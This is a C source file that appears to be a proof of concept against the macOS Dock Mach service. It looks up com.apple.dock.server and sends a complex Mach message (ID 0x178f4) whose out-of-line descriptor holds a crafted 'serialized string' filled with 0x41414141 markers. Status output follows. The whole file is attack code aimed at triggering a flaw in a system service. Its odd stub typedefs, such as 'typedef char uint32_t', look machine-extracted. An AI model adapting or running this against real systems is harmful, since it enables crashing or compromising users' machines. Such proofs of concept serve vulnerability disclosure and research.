
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


typedef char uint32_t ;
struct TYPE_6__ {int msgh_size; int msgh_remote_port; int msgh_id; int msgh_bits; int msgh_local_port; } ;
struct TYPE_5__ {char* address; int size; int copy; scalar_t__ deallocate; int type; } ;
struct TYPE_4__ {int msgh_descriptor_count; } ;
struct dock_msg {int ool_size; TYPE_3__ hdr; TYPE_2__ ool_desc; TYPE_1__ body; int member_0; } ;
typedef int serialized_string ;
typedef int mach_port_t ;
typedef scalar_t__ kern_return_t ;


 int EXIT_FAILURE ;
 scalar_t__ KERN_SUCCESS ;
 int MACH_MSGH_BITS (int ,int ) ;
 int MACH_MSGH_BITS_COMPLEX ;
 int MACH_MSG_OOL_DESCRIPTOR ;
 int MACH_MSG_PHYSICAL_COPY ;
 int MACH_MSG_TIMEOUT_NONE ;
 int MACH_MSG_TYPE_COPY_SEND ;
 int MACH_PORT_NULL ;
 int MACH_SEND_MSG ;
 scalar_t__ bootstrap_look_up (int ,char*,int*) ;
 int bootstrap_port ;
 int exit (int ) ;
 scalar_t__ mach_msg (TYPE_3__*,int ,int,int ,int ,int ,int ) ;
 int printf (char*,...) ;

int main() {
  kern_return_t err;
  mach_port_t service_port;
  err = bootstrap_look_up(bootstrap_port, "com.apple.dock.server", &service_port);
  if (err != KERN_SUCCESS) {
    printf(" [-] unable to lookup service");
    exit(EXIT_FAILURE);
  }
  printf("got service port: %x\n", service_port);

  uint32_t serialized_string[] =
   { 'abcd',
     0x0,
     0x41414141,
     0x41414141,
     0x1,
     0x2,
     0x3 };

 struct dock_msg m = {0};

  m.hdr.msgh_size = sizeof(struct dock_msg);
  m.hdr.msgh_local_port = MACH_PORT_NULL;
  m.hdr.msgh_remote_port = service_port;
  m.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
  m.hdr.msgh_bits |= MACH_MSGH_BITS_COMPLEX;
  m.hdr.msgh_id = 0x178f4;
  m.ool_size = sizeof(serialized_string);

  m.body.msgh_descriptor_count = 1;

  m.ool_desc.type = MACH_MSG_OOL_DESCRIPTOR;
  m.ool_desc.address = serialized_string;
  m.ool_desc.size = sizeof(serialized_string);
  m.ool_desc.deallocate = 0;
  m.ool_desc.copy = MACH_MSG_PHYSICAL_COPY;

  err = mach_msg(&m.hdr,
                 MACH_SEND_MSG,
                 m.hdr.msgh_size,
                 0,
                 MACH_PORT_NULL,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);

  if (err != KERN_SUCCESS) {
    printf(" [-] mach_msg failed with error code:%x\n", err);
    exit(EXIT_FAILURE);
  }
  printf(" [+] looks like that sent?\n");

  return 0;
}
